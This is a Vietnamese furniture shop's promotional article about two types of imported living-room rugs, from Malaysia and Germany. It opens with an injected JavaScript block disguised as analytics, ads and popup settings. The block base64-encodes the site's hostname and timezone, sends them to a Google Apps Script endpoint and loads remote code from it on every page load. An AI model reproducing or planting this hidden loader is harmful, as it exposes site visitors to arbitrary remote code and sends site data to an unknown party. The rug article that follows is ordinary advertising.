var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

2 loại thảm trải sàn phòng khách đẹp nên mua ngay

Nhu cầu mua thảm trải sàn phòng khách đẹp dành cho phòng khách trong mùa đông này đang tăng cao. Do đó nhiều người băn khoăn không biết nên mua loại thảm trải sàn nào? Dưới đây là những thông tin tư vấn hữu ích dành cho quý vị.

Các loại thảm trải sàn phòng khách đẹp chất lượng cao

Quý vị muốn mua thảm trang trí cho ghế sofa phòng khách hãy tham khảo ngay 2 loại thảm sofa đang được rất nhiều người ưa chuộng sử dụng dưới đây. Đây cũng là 2 loại thảm trang trí đang bán chạy nhất tại showroom của Nội Thất Xinh.

Thảm nhập khẩu từ Malaysia

Các mẫu thảm lông trải ghế sofa hiện đang rất được ưa chuộng trong mùa đông này. Bởi sản phẩm có chất lượng cao, mang tới không gian nội thất đẹp. Đồng thời mang tới cảm giác thoải mái và thư giãn dành cho người dùng.

thảm trải sàn phòng khách đẹp
Thảm nhập khẩu từ Malaysia

Đặc biệt những mẫu thảm trải sàn phòng khách đẹp nhập khẩu từ Malaysia đang là sự lựa chọn của nhiều người. Bởi sản phẩm có mẫu mã đẹp, thiết kế hợp xu hướng mà lại có giá thành cạnh tranh. Bởi vậy, dòng sản phẩm này là sự lựa chọn không tồi dành cho quý vị.

Thảm nhập khẩu từ Đức

Dòng thảm nhập khẩu từ Đức là sản phẩm có chất lượng cao trên thị trường. Do đó, nếu quý vị muốn mua thảm phòng khách cao cấp thì không nên bỏ qua dòng sản phẩm này. Các mẫu thảm trải dưới bộ bàn ghế sofa phòng khách giúp mang tới không gian ấm áp và thoải mái hơn cho ngôi nhà của quý vị.

thảm trải sàn phòng khách đẹp
Thảm nhập khẩu từ Đức

Quý vị muốn thảm trải sàn phòng khách đẹp nhập khẩu từ Malaysia, Đức với chính hãng hãy tới ngay siêu thị Nội Thất Xinh. Chúng tôi là địa chỉ cung cấp nhiều dòng thảm trải sàn khác nhau như: thảm trang trí sofa, thảm văn phòng nhập khẩu với giá cả vô cùng hợp lý.

Mọi thông tin cần tư vấn chi tiết xin liên hệ với chúng tôi theo số Hotline 0243 905 9999 – 0975 90 3333 để được giải đáp thêm.

=> Xem thêm: Mua sofa văn phòng ở đâu? Các loại sofa văn phòng được ưa chuộng